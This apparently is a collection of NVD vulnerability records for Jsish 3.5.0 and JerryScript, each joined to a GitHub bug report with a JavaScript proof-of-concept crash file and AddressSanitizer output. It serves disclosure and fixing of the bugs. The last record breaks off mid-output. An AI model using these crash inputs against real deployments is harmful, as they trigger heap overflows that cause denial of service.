[ "Exploit", "Patch", "Third Party Advisory" ]
github.com
[ "jerryscript-project", "jerryscript" ]
###### JerryScript revision Commit: [51da1551](https://github.com/jerryscript-project/jerryscript/commit/51da15516e1436184be9914314f76d596f14cd27) Version: v3.0.0 ###### Build platform Ubuntu 18.04.5 LTS (Linux 5.4.0-44-generic x86_64) ###### Build steps ```bash ./tools/build.py --clean --debug --profile=es2015-subset --compile-flag=-fsanitize=address --compile-flag=-m32 --lto=off --logging=on --line-info=on --error-message=on --system-allocator=on --stack-limit=20 ``` ###### Test case ```javascript function JSEtest(predicate, item) { if (!predicate) { log.push(item); } } var global = this; Object.getOwnPropertyNames(global).forEach(function (name) { if (name[0] != name[0].toUpperCase()) { return; } var obj = global[name]; if (!obj.toString().includes('native')) { return; } try { new obj(); } catch (e) { ; } var constructor = obj.constructor; var prototype = obj.prototype; var prototype_constructor = prototype.constructor; JSEtest(`${name}.prototype.constructor`); }); ``` ​ ###### Execution steps & Output ```bash $ ./jerryscript/build/bin/jerry poc.js ICE: Assertion 'ecma_object_check_class_name_is_object (obj_p)' failed at /root/jerryscript/jerry-core/ecma/operations/ecma-objects.c(ecma_object_get_class_name):3009. Error: ERR_FAILED_INTERNAL_ASSERTION ``` Credits: Found by OWL337 team.
Assertion 'ecma_object_check_class_name_is_object (obj_p)' failed at ecma-objects.c(ecma_object_get_class_name)
https://api.github.com/repos/jerryscript-project/jerryscript/issues/4895/comments
3
2021-12-09T14:58:57Z
2022-01-12T02:09:35Z
https://github.com/jerryscript-project/jerryscript/issues/4895
1,075,669,945
4,895
3,086
CVE-2021-46474
2022-01-25T01:15:07.817
Jsish v3.5.0 was discovered to contain a heap buffer overflow via jsiEvalCodeSub in src/jsiEval.c. This vulnerability can lead to a Denial of Service (DoS).
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 4.3, "confidentialityImpact": "NONE", "integrityImpact": "NONE", "vectorString": "AV:N/AC:M/Au:N/C:N/I:N/A:P", "version": "2.0" }, "exploitabilityScore": 8.6, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": true } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 5.5, "baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H", "version": "3.1" }, "exploitabilityScore": 1.8, "impactScore": 3.6, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Patch", "Third Party Advisory" ], "url": "https://github.com/pcmacdon/jsish/issues/57" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Patch", "Third Party Advisory" ], "url": "https://github.com/pcmacdon/jsish/issues/57" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:jsish:jsish:3.5.0:*:*:*:*:*:*:*", "matchCriteriaId": "E97897F2-55BD-40DD-9F33-7980D892A505", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "787" ]
787
https://github.com/pcmacdon/jsish/issues/57
[ "Exploit", "Patch", "Third Party Advisory" ]
github.com
[ "pcmacdon", "jsish" ]
###### Jsish revision Commit: [9fa798e](https://github.com/pcmacdon/jsish/commit/9fa798e35d7a753672d1bd16e98b124e7b2d2899) Version: v3.5.0 ###### Build platform Ubuntu 18.04.5 LTS (Linux 5.4.0-44-generic x86_64) ###### Build steps ```bash export CFLAGS='-fsanitize=address' make ``` ###### Test case ```javascript assert(newObj.hasOwnProperty("prop")).throws(SyntaxError, function () { eval("'use strict'; function _13_0_7_fun() {eval = 42;};"); _13_0_7_fun(); }); ``` ​ ###### Execution steps & Output ```bash $ ./jsish/jsish poc.js ================================================================= ========ERROR: AddressSanitizer: heap-buffer-overflow on address 0x6250000028f8 at pc 0x55bcbd952990 bp 0x7ffd837e9530 sp 0x7ffd837e9520 READ of size 8 at 0x6250000028f8 thread T0 #0 0x55bcbd95298f in jsiEvalCodeSub src/jsiEval.c:1366 #1 0x55bcbd95c15e in jsi_evalcode src/jsiEval.c:2204 #2 0x55bcbd960274 in jsi_evalStrFile src/jsiEval.c:2665 #3 0x55bcbd64f66a in Jsi_Main src/jsiInterp.c:936 #4 0x55bcbde5403a in jsi_main src/main.c:47 #5 0x7f3599d46bf6 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x21bf6) #6 0x55bcbd5e3969 in _start (/usr/local/bin/jsish+0xe8969) 0x6250000028f8 is located 8 bytes to the left of 8192-byte region [0x625000002900,0x625000004900) allocated by thread T0 here: #0 0x7f359a9b5f30 in realloc (/usr/lib/x86_64-linux-gnu/libasan.so.4+0xdef30) #1 0x55bcbd654972 in Jsi_Realloc src/jsiUtils.c:47 SUMMARY: AddressSanitizer: heap-buffer-overflow src/jsiEval.c:1366 in jsiEvalCodeSub Shadow bytes around the buggy address: 0x0c4a7fff84c0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c4a7fff84d0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c4a7fff84e0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c4a7fff84f0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c4a7fff8500: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa =>0x0c4a7fff8510: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa[fa] 0x0c4a7fff8520: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x0c4a7fff8530: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x0c4a7fff8540: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x0c4a7fff8550: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x0c4a7fff8560: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Shadow byte legend (one shadow byte represents 8 application bytes): Addressable: 00 Partially addressable: 01 02 03 04 05 06 07 Heap left redzone: fa Freed heap region: fd Stack left redzone: f1 Stack mid redzone: f2 Stack right redzone: f3 Stack after return: f5 Stack use after scope: f8 Global redzone: f9 Global init order: f6 Poisoned by user: f7 Container overflow: fc Array cookie: ac Intra object redzone: bb ASan internal: fe Left alloca redzone: ca Right alloca redzone: cb ========ABORTING ``` Credits: Found by OWL337 team.
Heap-buffer-overflow src/jsiEval.c:1366 in jsiEvalCodeSub
https://api.github.com/repos/pcmacdon/jsish/issues/57/comments
1
2021-12-24T09:47:27Z
2022-01-12T02:12:21Z
https://github.com/pcmacdon/jsish/issues/57
1,088,279,556
57
3,087
CVE-2021-46475
2022-01-25T01:15:07.853
Jsish v3.5.0 was discovered to contain a heap buffer overflow via jsi_ArraySliceCmd in src/jsiArray.c. This vulnerability can lead to a Denial of Service (DoS).
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 4.3, "confidentialityImpact": "NONE", "integrityImpact": "NONE", "vectorString": "AV:N/AC:M/Au:N/C:N/I:N/A:P", "version": "2.0" }, "exploitabilityScore": 8.6, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": true } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 5.5, "baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H", "version": "3.1" }, "exploitabilityScore": 1.8, "impactScore": 3.6, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Patch", "Third Party Advisory" ], "url": "https://github.com/pcmacdon/jsish/issues/64" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Patch", "Third Party Advisory" ], "url": "https://github.com/pcmacdon/jsish/issues/64" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:jsish:jsish:3.5.0:*:*:*:*:*:*:*", "matchCriteriaId": "E97897F2-55BD-40DD-9F33-7980D892A505", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "787" ]
787
https://github.com/pcmacdon/jsish/issues/64
[ "Exploit", "Patch", "Third Party Advisory" ]
github.com
[ "pcmacdon", "jsish" ]
###### Jsish revision Commit: [9fa798e](https://github.com/pcmacdon/jsish/commit/9fa798e35d7a753672d1bd16e98b124e7b2d2899) Version: v3.5.0 ###### Build platform Ubuntu 18.04.5 LTS (Linux 5.4.0-44-generic x86_64) ###### Build steps ```bash export CFLAGS='-fsanitize=address' make ``` ###### Test case ```javascript var arr = [ 'aa', 'bb' ]; var results = []; arr.findIndex(function (V) { if (results.length === 0) { arr.slice(1, arr.push('cc')); } }); results = []; arr = [ 'mm' ]; arr.findIndex(function (V) { if (results.length === 0) { arr.push('cc'); arr[1] = 'nn'; } results.push(V); }); ``` ​ ###### Execution steps & Output ```bash $ ./jsish/jsish poc.js ==87153==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x60c000018cc0 at pc 0x556c1807d671 bp 0x7ffc37cea3f0 sp 0x7ffc37cea3e0 READ of size 8 at 0x60c000018cc0 thread T0 #0 0x556c1807d670 in jsi_ArraySliceCmd src/jsiArray.c:912 #1 0x556c1804c818 in jsi_FuncCallSub src/jsiProto.c:244 #2 0x556c1831671a in jsiFunctionSubCall src/jsiEval.c:796 #3 0x556c1831671a in jsiEvalFunction src/jsiEval.c:837 #4 0x556c1831671a in jsiEvalCodeSub src/jsiEval.c:1264 #5 0x556c1832a15e in jsi_evalcode src/jsiEval.c:2204 #6 0x556c1804d834 in jsi_FuncCallSub src/jsiProto.c:220 #7 0x556c17fc9fec in jsi_FunctionInvoke src/jsiFunc.c:777 #8 0x556c17fc9fec in Jsi_FunctionInvoke src/jsiFunc.c:789 #9 0x556c1808ac0b in jsi_ArrayFindSubCmd src/jsiArray.c:576 #10 0x556c1808ac0b in jsi_ArrayFindIndexCmd src/jsiArray.c:666 #11 0x556c1804c818 in jsi_FuncCallSub src/jsiProto.c:244 #12 0x556c1831671a in jsiFunctionSubCall src/jsiEval.c:796 #13 0x556c1831671a in jsiEvalFunction src/jsiEval.c:837 #14 0x556c1831671a in jsiEvalCodeSub src/jsiEval.c:1264 #15 0x556c1832a15e in jsi_evalcode src/jsiEval.c:2204 #16 0x556c1832e274 in jsi_evalStrFile src/jsiEval.c:2665 #17 0x556c1801d66a in Jsi_Main src/jsiInterp.c:936 #18 0x556c1882203a in jsi_main src/main.c:47 #19 0x7f116a702bf6 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x21bf6) #20 0x556c17fb1969 in _start (/usr/local/bin/jsish+0xe8969) 0x60c000018cc0 is located 0 bytes to the right of 128-byte region [0x60c000018c40,0x60c000018cc0) allocated by thread T0 here: #0 0x7f116b371f30 in realloc (/usr/lib/x86_64-linux-gnu/libasan.so.4+0xdef30) #1 0x556c18022972 in Jsi_Realloc src/jsiUtils.c:47 SUMMARY: AddressSanitizer: heap-buffer-overflow src/jsiArray.c:912 in jsi_ArraySliceCmd Shadow bytes around the buggy address: 0x0c187fffb140: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd 0x0c187fffb150: fa fa fa fa fa fa fa fa fd fd fd fd fd fd fd fd 0x0c187fffb160: fd fd fd fd fd fd fd fd fa fa fa fa fa fa fa fa 0x0c187fffb170: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x0c187fffb180: fa fa fa fa fa fa fa fa 00 00 00 00 00 00 00 00 =>0x0c187fffb190: 00 00 00 00 00 00 00 00[fa]fa fa fa fa fa fa fa 0x0c187fffb1a0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x0c187fffb1b0: fa fa fa fa fa fa fa fa 00 00 00 00 00 00 00 00 0x0c187fffb1c0: 00 00 00 00 00 00 00 00 fa fa fa fa fa fa fa fa 0x0c187fffb1d0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x0c187fffb1e0: fa fa fa fa fa fa fa fa 00 00 00 00 00 00 00 00 Shadow byte legend (one shadow byte represents 8 application bytes): Addressable: 00 Partially addressable: 01 02 03 04 05 06 07 Heap left redzone: fa Freed heap region: fd Stack left redzone: f1 Stack mid redzone: f2 Stack right redzone: f3 Stack after return: f5 Stack use after scope: f8 Global redzone: f9 Global init order: f6 Poisoned by user: f7 Container overflow: fc Array cookie: ac Intra object redzone: bb ASan internal: fe Left alloca redzone: ca Right alloca redzone: cb ```
Heap-buffer-overflow src/jsiArray.c:912 in jsi_ArraySliceCmd
https://api.github.com/repos/pcmacdon/jsish/issues/64/comments
0
2021-12-24T10:33:23Z
2021-12-26T17:16:57Z
https://github.com/pcmacdon/jsish/issues/64
1,088,304,005
64
3,088
CVE-2021-46477
2022-01-25T01:15:07.893
Jsish v3.5.0 was discovered to contain a heap buffer overflow via RegExp_constructor in src/jsiRegexp.c. This vulnerability can lead to a Denial of Service (DoS).
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 4.3, "confidentialityImpact": "NONE", "integrityImpact": "NONE", "vectorString": "AV:N/AC:M/Au:N/C:N/I:N/A:P", "version": "2.0" }, "exploitabilityScore": 8.6, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": true } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 5.5, "baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H", "version": "3.1" }, "exploitabilityScore": 1.8, "impactScore": 3.6, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Patch", "Third Party Advisory" ], "url": "https://github.com/pcmacdon/jsish/issues/63" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Patch", "Third Party Advisory" ], "url": "https://github.com/pcmacdon/jsish/issues/63" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:jsish:jsish:3.5.0:*:*:*:*:*:*:*", "matchCriteriaId": "E97897F2-55BD-40DD-9F33-7980D892A505", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "787" ]
787
https://github.com/pcmacdon/jsish/issues/63
[ "Exploit", "Patch", "Third Party Advisory" ]
github.com
[ "pcmacdon", "jsish" ]
###### Jsish revision Commit: [9fa798e](https://github.com/pcmacdon/jsish/commit/9fa798e35d7a753672d1bd16e98b124e7b2d2899) Version: v3.5.0 ###### Build platform Ubuntu 18.04.5 LTS (Linux 5.4.0-44-generic x86_64) ###### Build steps ```bash export CFLAGS='-fsanitize=address' make ``` ###### Test case ```javascript function JSEtest() { var bound; var t; bound = RegExp.bind('baz', 'quuux'); t = new bound('i'); } try { JSEtest(); } catch (e) { } ``` ​ ###### Execution steps & Output ```bash $ ./jsish/jsish poc.js ==21392==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x604000018e48 at pc 0x55de4613ce12 bp 0x7ffdf013bf00 sp 0x7ffdf013bef0 WRITE of size 8 at 0x604000018e48 thread T0 #0 0x55de4613ce11 in RegExp_constructor src/jsiRegexp.c:176 #1 0x55de4619b818 in jsi_FuncCallSub src/jsiProto.c:244 #2 0x55de46118fec in jsi_FunctionInvoke src/jsiFunc.c:777 #3 0x55de46118fec in Jsi_FunctionInvoke src/jsiFunc.c:789 #4 0x55de46194ad6 in jsi_FuncBindCall src/jsiProto.c:299 #5 0x55de4619b818 in jsi_FuncCallSub src/jsiProto.c:244 #6 0x55de4646571a in jsiFunctionSubCall src/jsiEval.c:796 #7 0x55de4646571a in jsiEvalFunction src/jsiEval.c:837 #8 0x55de4646571a in jsiEvalCodeSub src/jsiEval.c:1264 #9 0x55de4647915e in jsi_evalcode src/jsiEval.c:2204 #10 0x55de4619c834 in jsi_FuncCallSub src/jsiProto.c:220 #11 0x55de464655ab in jsiFunctionSubCall src/jsiEval.c:796 #12 0x55de464655ab in jsiEvalFunction src/jsiEval.c:837 #13 0x55de464655ab in jsiEvalCodeSub src/jsiEval.c:1264 #14 0x55de4647915e in jsi_evalcode src/jsiEval.c:2204 #15 0x55de4647d274 in jsi_evalStrFile src/jsiEval.c:2665 #16 0x55de4616c66a in Jsi_Main src/jsiInterp.c:936 #17 0x55de4697103a in jsi_main src/main.c:47 #18 0x7ff1757adbf6 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x21bf6) #19 0x55de46100969 in _start (/usr/local/bin/jsish+0xe8969) 0x604000018e48 is located 8 bytes to the left of 48-byte region [0x604000018e50,0x604000018e80) allocated by thread T0 here: #0 0x7ff17641cd28 in __interceptor_calloc (/usr/lib/x86_64-linux-gnu/libasan.so.4+0xded28) #1 0x55de46171aa4 in Jsi_Calloc src/jsiUtils.c:57 SUMMARY: AddressSanitizer: heap-buffer-overflow src/jsiRegexp.c:176 in RegExp_constructor Shadow bytes around the buggy address: 0x0c087fffb170: fa fa fd fd fd fd fd fa fa fa fd fd fd fd fd fa 0x0c087fffb180: fa fa fd fd fd fd fd fa fa fa fd fd fd fd fd fa 0x0c087fffb190: fa fa 00 00 00 00 00 00 fa fa fd fd fd fd fd fa 0x0c087fffb1a0: fa fa 00 00 00 00 00 00 fa fa fd fd fd fd fd fa 0x0c087fffb1b0: fa fa fd fd fd fd fd fa fa fa fd fd fd fd fd fa =>0x0c087fffb1c0: fa fa 00 00 00 00 00 04 fa[fa]00 00 00 00 00 00 0x0c087fffb1d0: fa fa fd fd fd fd fd fa fa fa 00 00 00 00 00 06 0x0c087fffb1e0: fa fa 00 00 00 00 00 00 fa fa fd fd fd fd fd fa 0x0c087fffb1f0: fa fa fd fd fd fd fd fa fa fa fd fd fd fd fd fa 0x0c087fffb200: fa fa fd fd fd fd fd fa fa fa fd fd fd fd fd fa 0x0c087fffb210: fa fa fd fd fd fd fd fa fa fa fd fd fd fd fd fa Shadow byte legend (one shadow byte represents 8 application bytes): Addressable: 00 Partially addressable: 01 02 03 04 05 06 07 Heap left redzone: fa Freed heap region: fd Stack left redzone: f1 Stack mid redzone: f2 Stack right redzone: f3 Stack after return: f5 Stack use after scope: f8 Global redzone: f9 Global init order: f6 Poisoned by user: f7 Container overflow: fc Array cookie: ac Intra object redzone: bb ASan internal: fe Left alloca redzone: ca Right alloca redzone: cb ``` Credits: Found by OWL337 team.
Heap-buffer-overflow src/jsiRegexp.c:176 in RegExp_constructor
https://api.github.com/repos/pcmacdon/jsish/issues/63/comments
0
2021-12-24T10:32:32Z
2022-01-12T02:13:42Z
https://github.com/pcmacdon/jsish/issues/63
1,088,303,589
63
3,089
CVE-2021-46478
2022-01-25T01:15:07.930
Jsish v3.5.0 was discovered to contain a heap buffer overflow via jsiClearStack in src/jsiEval.c. This vulnerability can lead to a Denial of Service (DoS).
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 4.3, "confidentialityImpact": "NONE", "integrityImpact": "NONE", "vectorString": "AV:N/AC:M/Au:N/C:N/I:N/A:P", "version": "2.0" }, "exploitabilityScore": 8.6, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": true } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 5.5, "baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H", "version": "3.1" }, "exploitabilityScore": 1.8, "impactScore": 3.6, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Patch", "Third Party Advisory" ], "url": "https://github.com/pcmacdon/jsish/issues/60" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Patch", "Third Party Advisory" ], "url": "https://github.com/pcmacdon/jsish/issues/60" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:jsish:jsish:3.5.0:*:*:*:*:*:*:*", "matchCriteriaId": "E97897F2-55BD-40DD-9F33-7980D892A505", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "787" ]
787
https://github.com/pcmacdon/jsish/issues/60
[ "Exploit", "Patch", "Third Party Advisory" ]
github.com
[ "pcmacdon", "jsish" ]
###### Jsish revision Commit: [9fa798e](https://github.com/pcmacdon/jsish/commit/9fa798e35d7a753672d1bd16e98b124e7b2d2899) Version: v3.5.0 ###### Build platform Ubuntu 18.04.5 LTS (Linux 5.4.0-44-generic x86_64) ###### Build steps ```bash export CFLAGS='-fsanitize=address' make ``` ###### Test case ```javascript var a = Math.sin(Math.PI/2); if (a === 1) { switch (a) { case assert(accessed, 'accessed !== true'): break; default: throw "FAIL"; } } ``` ​ ###### Execution steps & Output ```bash $ ./jsish/jsish poc.js ==52181==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x6250000000f8 at pc 0x55ff51f35d58 bp 0x7fff48257760 sp 0x7fff48257750 READ of size 8 at 0x6250000000f8 thread T0 #0 0x55ff51f35d57 in jsiClearStack src/jsiEval.c:120 #1 0x55ff51f35d57 in jsiPop src/jsiEval.c:200 #2 0x55ff51f35d57 in jsiEvalCodeSub src/jsiEval.c:1390 #3 0x55ff51f4215e in jsi_evalcode src/jsiEval.c:2204 #4 0x55ff51f46274 in jsi_evalStrFile src/jsiEval.c:2665 #5 0x55ff51c3566a in Jsi_Main src/jsiInterp.c:936 #6 0x55ff5243a03a in jsi_main src/main.c:47 #7 0x7fab5e008bf6 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x21bf6) #8 0x55ff51bc9969 in _start (/usr/local/bin/jsish+0xe8969) 0x6250000000f8 is located 8 bytes to the left of 8192-byte region [0x625000000100,0x625000002100) allocated by thread T0 here: #0 0x7fab5ec77f30 in realloc (/usr/lib/x86_64-linux-gnu/libasan.so.4+0xdef30) #1 0x55ff51c3a972 in Jsi_Realloc src/jsiUtils.c:47 SUMMARY: AddressSanitizer: heap-buffer-overflow src/jsiEval.c:120 in jsiClearStack Shadow bytes around the buggy address: 0x0c4a7fff7fc0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x0c4a7fff7fd0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x0c4a7fff7fe0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x0c4a7fff7ff0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x0c4a7fff8000: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa =>0x0c4a7fff8010: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa[fa] 0x0c4a7fff8020: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x0c4a7fff8030: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x0c4a7fff8040: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x0c4a7fff8050: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x0c4a7fff8060: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Shadow byte legend (one shadow byte represents 8 application bytes): Addressable: 00 Partially addressable: 01 02 03 04 05 06 07 Heap left redzone: fa Freed heap region: fd Stack left redzone: f1 Stack mid redzone: f2 Stack right redzone: f3 Stack after return: f5 Stack use after scope: f8 Global redzone: f9 Global init order: f6 Poisoned by user: f7 Container overflow: fc Array cookie: ac Intra object redzone: bb ASan internal: fe Left alloca redzone: ca Right alloca redzone: cb ==52181==ABORTING ``` Credits: Found by OWL337 team.
Heap-buffer-overflow src/jsiEval.c:120 in jsiClearStack
https://api.github.com/repos/pcmacdon/jsish/issues/60/comments
0
2021-12-24T09:50:51Z
2022-01-12T02:12:56Z
https://github.com/pcmacdon/jsish/issues/60
1,088,281,295
60
3,090
CVE-2021-46480
2022-01-25T01:15:07.970
Jsish v3.5.0 was discovered to contain a heap buffer overflow via jsiValueObjDelete in src/jsiEval.c. This vulnerability can lead to a Denial of Service (DoS).
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 4.3, "confidentialityImpact": "NONE", "integrityImpact": "NONE", "vectorString": "AV:N/AC:M/Au:N/C:N/I:N/A:P", "version": "2.0" }, "exploitabilityScore": 8.6, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": true } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 5.5, "baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H", "version": "3.1" }, "exploitabilityScore": 1.8, "impactScore": 3.6, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Patch", "Third Party Advisory" ], "url": "https://github.com/pcmacdon/jsish/issues/61" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Patch", "Third Party Advisory" ], "url": "https://github.com/pcmacdon/jsish/issues/61" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:jsish:jsish:3.5.0:*:*:*:*:*:*:*", "matchCriteriaId": "E97897F2-55BD-40DD-9F33-7980D892A505", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "787" ]
787
https://github.com/pcmacdon/jsish/issues/61
[ "Exploit", "Patch", "Third Party Advisory" ]
github.com
[ "pcmacdon", "jsish" ]
###### Jsish revision Commit: [9fa798e](https://github.com/pcmacdon/jsish/commit/9fa798e35d7a753672d1bd16e98b124e7b2d2899) Version: v3.5.0 ###### Build platform Ubuntu 18.04.5 LTS (Linux 5.4.0-44-generic x86_64) ###### Build steps ```bash export CFLAGS='-fsanitize=address' make ``` ###### Test case ```javascript var arr = []; arr.x = 0; delete arr[assert(hasProperty, 'hasProperty !== true')]; for (var i = 0; i < 2; ++i) arr.unshift(i); ``` ​ ###### Execution steps & Output ```bash $ ./jsish/jsish poc.js ===ERROR: AddressSanitizer: heap-buffer-overflow on address 0x60600000df38 at pc 0x5566ebe0b2f9 bp 0x7fffd0654660 sp 0x7fffd0654650 READ of size 8 at 0x60600000df38 thread T0 #0 0x5566ebe0b2f8 in jsiValueObjDelete src/jsiEval.c:464 #1 0x5566ebe0b2f8 in jsiEvalCodeSub src/jsiEval.c:1885 #2 0x5566ebe1915e in jsi_evalcode src/jsiEval.c:2204 #3 0x5566ebe1d274 in jsi_evalStrFile src/jsiEval.c:2665 #4 0x5566ebb0c66a in Jsi_Main src/jsiInterp.c:936 #5 0x5566ec31103a in jsi_main src/main.c:47 #6 0x7fbbb1d73bf6 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x21bf6) #7 0x5566ebaa0969 in _start (/usr/local/bin/jsish+0xe8969) Address 0x60600000df38 is a wild pointer. SUMMARY: AddressSanitizer: 